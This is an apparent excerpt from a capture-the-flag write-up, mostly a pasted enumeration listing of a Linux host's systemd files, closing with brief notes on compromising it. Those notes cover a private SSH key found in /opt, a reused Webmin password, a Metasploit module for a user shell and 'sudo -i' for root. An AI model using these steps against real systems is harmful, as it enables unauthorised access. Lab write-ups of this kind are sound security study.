-rw-r--r-- 1 root root 693 Jul 22 17:45 systemd-sysctl.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 systemd-
timedated.service
-rw-r--r-- 1 root root 1.4K Jul 22 17:45 systemd-
timesyncd.service
-rw-r--r-- 1 root root 659 Jul 22 17:45 systemd-tmpfiles-
clean.service
-rw-r--r-- 1 root root 764 Jul 22 17:45 systemd-tmpfiles-setup-
dev.service
-rw-r--r-- 1 root root 744 Jul 22 17:45 systemd-tmpfiles-
setup.service
-rw-r--r-- 1 root root 985 Jul 22 17:45 systemd-udevd.service
-rw-r--r-- 1 root root 863 Jul 22 17:45 systemd-udev-
settle.service
-rw-r--r-- 1 root root 755 Jul 22 17:45 systemd-udev-
trigger.service
-rw-r--r-- 1 root root 797 Jul 22 17:45 systemd-update-utmp-
runlevel.service
41/59
-rw-r--r-- 1 root root 794 Jul 22 17:45 systemd-update-
utmp.service
-rw-r--r-- 1 root root 628 Jul 22 17:45 systemd-user-
sessions.service
-rw-r--r-- 1 root root 690 Jul 22 17:45 systemd-volatile-
root.service
-rw-r--r-- 1 root root 1.4K Jul 22 17:45 system-update-
cleanup.service
lrwxrwxrwx 1 root root 21 Jul 22 17:45 udev.service ->
systemd-udevd.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountfs.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountnfs.service -
> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountroot.service -
> /dev/null
lrwxrwxrwx 1 root root 27 Jul 22 17:45 urandom.service ->
systemd-random-seed.service
-rw-r--r-- 1 root root 593 Jul 22 17:45 user@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 x11-common.service -
> /dev/null
-rw-r--r-- 1 root root 346 Jul 16 19:14 apache2.service
-rw-r--r-- 1 root root 418 Jul 16 19:14 apache2@.service
-rw-r--r-- 1 root root 528 Jul 16 19:14 apache-
htcacheclean.service
-rw-r--r-- 1 root root 537 Jul 16 19:14 apache-
htcacheclean@.service
-rw-r--r-- 1 root root 2.4K Jul 14 20:20 redis-server@.service
-rw-r--r-- 1 root root 161 Jul 8 19:43 motd-news.timer
-rw-r--r-- 1 root root 505 Jun 10 19:05 dbus.service
-rw-r--r-- 1 root root 106 Jun 10 19:05 dbus.socket
-rw-r--r-- 1 root root 326 May 7 2019 apt-daily.service
-rw-r--r-- 1 root root 156 May 7 2019 apt-daily.timer
-rw-r--r-- 1 root root 238 May 7 2019 apt-daily-
upgrade.service
-rw-r--r-- 1 root root 184 May 7 2019 apt-daily-
upgrade.timer
-rw-r--r-- 1 root root 312 Apr 23 2019 console-setup.service
42/59
-rw-r--r-- 1 root root 287 Apr 23 2019 keyboard-setup.service
-rw-r--r-- 1 root root 330 Apr 23 2019 setvtrgb.service
-rw-r--r-- 1 root root 404 Apr 9 2019 ureadahead.service
-rw-r--r-- 1 root root 250 Apr 9 2019 ureadahead-
stop.service
-rw-r--r-- 1 root root 242 Apr 9 2019 ureadahead-stop.timer
-rw-r--r-- 1 root root 412 Apr 4 2019 plymouth-halt.service
-rw-r--r-- 1 root root 426 Apr 4 2019 plymouth-kexec.service
lrwxrwxrwx 1 root root 27 Apr 4 2019 plymouth-
log.service -> plymouth-read-write.service
-rw-r--r-- 1 root root 421 Apr 4 2019 plymouth-
poweroff.service
-rw-r--r-- 1 root root 194 Apr 4 2019 plymouth-quit.service
-rw-r--r-- 1 root root 200 Apr 4 2019 plymouth-quit-
wait.service
-rw-r--r-- 1 root root 244 Apr 4 2019 plymouth-read-
write.service
-rw-r--r-- 1 root root 416 Apr 4 2019 plymouth-
reboot.service
lrwxrwxrwx 1 root root 21 Apr 4 2019 plymouth.service ->
plymouth-quit.service
-rw-r--r-- 1 root root 532 Apr 4 2019 plymouth-start.service
-rw-r--r-- 1 root root 291 Apr 4 2019 plymouth-switch-
root.service
-rw-r--r-- 1 root root 490 Apr 4 2019 systemd-ask-password-
plymouth.path
-rw-r--r-- 1 root root 467 Apr 4 2019 systemd-ask-password-
plymouth.service
-rw-r--r-- 1 root root 368 Jan 9 2019 irqbalance.service
-rw-r--r-- 1 root root 92 Oct 15 2018 fstrim.service
-rw-r--r-- 1 root root 170 Oct 15 2018 fstrim.timer
-rw-r--r-- 1 root root 189 Oct 15 2018 uuidd.service
-rw-r--r-- 1 root root 126 Oct 15 2018 uuidd.socket
-rw-r--r-- 1 root root 618 Oct 15 2018 friendly-
recovery.service
-rw-r--r-- 1 root root 172 Oct 15 2018 friendly-
recovery.target
-rw-r--r-- 1 root root 258 Oct 15 2018 networkd-
43/59
dispatcher.service
-rw-r--r-- 1 root root 173 Aug 6 2018 motd-news.service
-rw-r--r-- 1 root root 290 Apr 24 2018 rsyslog.service
drwxr-xr-x 2 root root 4.0K Apr 20 2018
runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018
runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018
runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018
runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018
runlevel5.target.wants
-rw-r--r-- 1 root root 544 Mar 22 2018 apparmor.service
-rw-r--r-- 1 root root 919 Jan 28 2018 basic.target
-rw-r--r-- 1 root root 419 Jan 28 2018 bluetooth.target
-rw-r--r-- 1 root root 465 Jan 28 2018 cryptsetup-pre.target
-rw-r--r-- 1 root root 412 Jan 28 2018 cryptsetup.target
-rw-r--r-- 1 root root 750 Jan 28 2018 dev-hugepages.mount
-rw-r--r-- 1 root root 665 Jan 28 2018 dev-mqueue.mount
-rw-r--r-- 1 root root 471 Jan 28 2018 emergency.target
-rw-r--r-- 1 root root 541 Jan 28 2018 exit.target
-rw-r--r-- 1 root root 480 Jan 28 2018 final.target
-rw-r--r-- 1 root root 506 Jan 28 2018 getty-pre.target
-rw-r--r-- 1 root root 500 Jan 28 2018 getty.target
-rw-r--r-- 1 root root 598 Jan 28 2018 graphical.target
-rw-r--r-- 1 root root 527 Jan 28 2018 halt.target
-rw-r--r-- 1 root root 509 Jan 28 2018 hibernate.target
-rw-r--r-- 1 root root 530 Jan 28 2018 hybrid-sleep.target
-rw-r--r-- 1 root root 593 Jan 28 2018 initrd-fs.target
-rw-r--r-- 1 root root 561 Jan 28 2018 initrd-root-
device.target
-rw-r--r-- 1 root root 566 Jan 28 2018 initrd-root-fs.target
-rw-r--r-- 1 root root 754 Jan 28 2018 initrd-switch-root.target
-rw-r--r-- 1 root root 763 Jan 28 2018 initrd.target
-rw-r--r-- 1 root root 541 Jan 28 2018 kexec.target
-rw-r--r-- 1 root root 435 Jan 28 2018 local-fs-pre.target
-rw-r--r-- 1 root root 547 Jan 28 2018 local-fs.target
44/59
-rw-r--r-- 1 root root 445 Jan 28 2018 machine.slice
-rw-r--r-- 1 root root 532 Jan 28 2018 multi-user.target
-rw-r--r-- 1 root root 505 Jan 28 2018 network-online.target
-rw-r--r-- 1 root root 502 Jan 28 2018 network-pre.target
-rw-r--r-- 1 root root 521 Jan 28 2018 network.target
-rw-r--r-- 1 root root 554 Jan 28 2018 nss-lookup.target
-rw-r--r-- 1 root root 513 Jan 28 2018 nss-user-lookup.target
-rw-r--r-- 1 root root 394 Jan 28 2018 paths.target
-rw-r--r-- 1 root root 592 Jan 28 2018 poweroff.target
-rw-r--r-- 1 root root 417 Jan 28 2018 printer.target
-rw-r--r-- 1 root root 745 Jan 28 2018 proc-sys-fs-
binfmt_misc.automount
-rw-r--r-- 1 root root 655 Jan 28 2018 proc-sys-fs-
binfmt_misc.mount
-rw-r--r-- 1 root root 583 Jan 28 2018 reboot.target
-rw-r--r-- 1 root root 549 Jan 28 2018 remote-
cryptsetup.target
-rw-r--r-- 1 root root 436 Jan 28 2018 remote-fs-pre.target
-rw-r--r-- 1 root root 522 Jan 28 2018 remote-fs.target
-rw-r--r-- 1 root root 492 Jan 28 2018 rescue.target
-rw-r--r-- 1 root root 540 Jan 28 2018 rpcbind.target
-rw-r--r-- 1 root root 442 Jan 28 2018 shutdown.target
-rw-r--r-- 1 root root 402 Jan 28 2018 sigpwr.target
-rw-r--r-- 1 root root 460 Jan 28 2018 sleep.target
-rw-r--r-- 1 root root 449 Jan 28 2018 slices.target
-rw-r--r-- 1 root root 420 Jan 28 2018 smartcard.target
-rw-r--r-- 1 root root 396 Jan 28 2018 sockets.target
-rw-r--r-- 1 root root 420 Jan 28 2018 sound.target
-rw-r--r-- 1 root root 503 Jan 28 2018 suspend.target
-rw-r--r-- 1 root root 393 Jan 28 2018 swap.target
-rw-r--r-- 1 root root 795 Jan 28 2018 sys-fs-fuse-
connections.mount
-rw-r--r-- 1 root root 558 Jan 28 2018 sysinit.target
-rw-r--r-- 1 root root 767 Jan 28 2018 sys-kernel-
config.mount
-rw-r--r-- 1 root root 710 Jan 28 2018 sys-kernel-
debug.mount
-rw-r--r-- 1 root root 1.4K Jan 28 2018 syslog.socket
45/59
-rw-r--r-- 1 root root 704 Jan 28 2018 systemd-ask-password-
console.path
-rw-r--r-- 1 root root 632 Jan 28 2018 systemd-ask-password-
wall.path
-rw-r--r-- 1 root root 564 Jan 28 2018 systemd-initctl.socket
-rw-r--r-- 1 root root 1.2K Jan 28 2018 systemd-journald-dev-
log.socket
-rw-r--r-- 1 root root 882 Jan 28 2018 systemd-
journald.socket
-rw-r--r-- 1 root root 631 Jan 28 2018 systemd-
networkd.socket
-rw-r--r-- 1 root root 657 Jan 28 2018 systemd-rfkill.socket
-rw-r--r-- 1 root root 490 Jan 28 2018 systemd-tmpfiles-
clean.timer
-rw-r--r-- 1 root root 635 Jan 28 2018 systemd-udevd-
control.socket
-rw-r--r-- 1 root root 610 Jan 28 2018 systemd-udevd-
kernel.socket
-rw-r--r-- 1 root root 445 Jan 28 2018 system.slice
-rw-r--r-- 1 root root 592 Jan 28 2018 system-update.target
-rw-r--r-- 1 root root 445 Jan 28 2018 timers.target
-rw-r--r-- 1 root root 435 Jan 28 2018 time-sync.target
-rw-r--r-- 1 root root 457 Jan 28 2018 umount.target
-rw-r--r-- 1 root root 432 Jan 28 2018 user.slice
-rw-r--r-- 1 root root 493 Jan 25 2018 ssh.service
-rw-r--r-- 1 root root 244 Jan 25 2018 ssh@.service
lrwxrwxrwx 1 root root 9 Jan 18 2018 sudo.service -> /dev/
null
-rw-r--r-- 1 root root 155 Jan 17 2018
phpsessionclean.service
-rw-r--r-- 1 root root 144 Jan 17 2018 phpsessionclean.timer
-rw-r--r-- 1 root root 216 Jan 16 2018 ssh.socket
-rw-r--r-- 1 root root 741 Dec 18 2017 accounts-
daemon.service
-rw-r--r-- 1 root root 251 Nov 16 2017 cron.service
-rw-r--r-- 1 root root 266 Aug 15 2017 ufw.service
-rw-r--r-- 1 root root 626 Nov 28 2016 ifup@.service
-rw-r--r-- 1 root root 735 Nov 25 2016 networking.service
46/59
-rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service
/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Jul 16 19:14 apache2-systemd.conf
/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-halt.service
-> ../plymouth-halt.service
/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-
start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Apr 4 2019 plymouth-switch-
root.service -> ../plymouth-switch-root.service
/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-
kexec.service -> ../plymouth-kexec.service
/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Jul 22 17:45 getty.target -> ../
getty.target
lrwxrwxrwx 1 root root 33 Jul 22 17:45 systemd-ask-
password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-
logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jul 22 17:45 systemd-update-utmp-
runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-user-
sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jun 10 19:05 dbus.service -> ../
dbus.service
lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-quit.service
47/59
-> ../plymouth-quit.service
lrwxrwxrwx 1 root root 29 Apr 4 2019 plymouth-quit-
wait.service -> ../plymouth-quit-wait.service
/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 28 Apr 4 2019 plymouth-
poweroff.service -> ../plymouth-poweroff.service
/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 26 Apr 4 2019 plymouth-
reboot.service -> ../plymouth-reboot.service
/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Jul 22 17:45 cryptsetup.target -
> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jul 22 17:45 dev-
hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jul 22 17:45 dev-mqueue.mount -
> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jul 22 17:45 kmod-static-
nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jul 22 17:45 proc-sys-fs-
binfmt_misc.automount -> ../proc-sys-fs-
binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jul 22 17:45 sys-fs-fuse-
connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jul 22 17:45 sys-kernel-
config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jul 22 17:45 sys-kernel-
debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jul 22 17:45 systemd-ask-
password-console.path -> ../systemd-ask-password-
console.path
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-
binfmt.service -> ../systemd-binfmt.service
48/59
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-hwdb-
update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 27 Jul 22 17:45 systemd-
journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-journal-
flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 36 Jul 22 17:45 systemd-machine-id-
commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-modules-
load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-random-
seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-
sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jul 22 17:45 systemd-tmpfiles-
setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jul 22 17:45 systemd-tmpfiles-
setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 24 Jul 22 17:45 systemd-
udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-udev-
trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-update-
utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 Apr 4 2019 plymouth-read-
write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-
start.service -> ../plymouth-start.service
/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jul 22 17:45 getty-static.service -
> ../getty-static.service
/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 22 17:45 systemd-update-utmp-
runlevel.service -> ../systemd-update-utmp-runlevel.service
49/59
/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jul 22 17:45 systemd-remount-
fs.service -> ../systemd-remount-fs.service
/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 22 17:45 systemd-update-utmp-
runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jul 22 17:45 systemd-initctl.socket
-> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jul 22 17:45 systemd-journald-
audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jul 22 17:45 systemd-journald-dev-
log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jul 22 17:45 systemd-
journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-udevd-
control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jul 22 17:45 systemd-udevd-
kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jun 10 19:05 dbus.socket -> ../
dbus.socket
/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jul 22 17:45 systemd-tmpfiles-
clean.timer -> ../systemd-tmpfiles-clean.timer
/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jul 22 17:45 debian.conf
/lib/systemd/system/user@.service.d:
50/59
total 4.0K
-rw-r--r-- 1 root root 125 Jul 22 17:45 timeout.conf
/lib/systemd/system/runlevel1.target.wants:
total 0
/lib/systemd/system/runlevel2.target.wants:
total 0
/lib/systemd/system/runlevel3.target.wants:
total 0
/lib/systemd/system/runlevel4.target.wants:
total 0
/lib/systemd/system/runlevel5.target.wants:
total 0
/lib/systemd/system-generators:
total 200K
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-cryptsetup-
generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-debug-
generator
-rwxr-xr-x 1 root root 31K Jul 22 17:45 systemd-fstab-
generator
-rwxr-xr-x 1 root root 14K Jul 22 17:45 systemd-getty-
generator
-rwxr-xr-x 1 root root 26K Jul 22 17:45 systemd-gpt-auto-
generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-hibernate-
resume-generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-rc-local-
generator
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-system-
update-generator
-rwxr-xr-x 1 root root 31K Jul 22 17:45 systemd-sysv-
generator
51/59
-rwxr-xr-x 1 root root 14K Jul 22 17:45 systemd-veritysetup-
generator
-rwxr-xr-x 1 root root 286 Jun 21 15:07 friendly-recovery
/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Feb 22 2018 hdparm
/lib/systemd/network:
total 16K
-rw-r--r-- 1 root root 645 Jan 28 2018 80-container-
host0.network
-rw-r--r-- 1 root root 718 Jan 28 2018 80-container-
ve.network
-rw-r--r-- 1 root root 704 Jan 28 2018 80-container-vz.network
-rw-r--r-- 1 root root 412 Jan 28 2018 99-default.link
/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 951 Jan 28 2018 90-systemd.preset
/lib/systemd/system-shutdown:
total 0
### SOFTWARE
#######################################
[-] Sudo version:
Sudo version 1.8.21p2
57/59
ssh
we got ssh private key for the user (matt) from /opt
58/59
Webmin
until now we have the password of user account for webmin
use metasploit to get the user shell ,(change the ssl to true)
and root shell turned out to be very simple , just "sudo -i" in
the webmin dir
59/59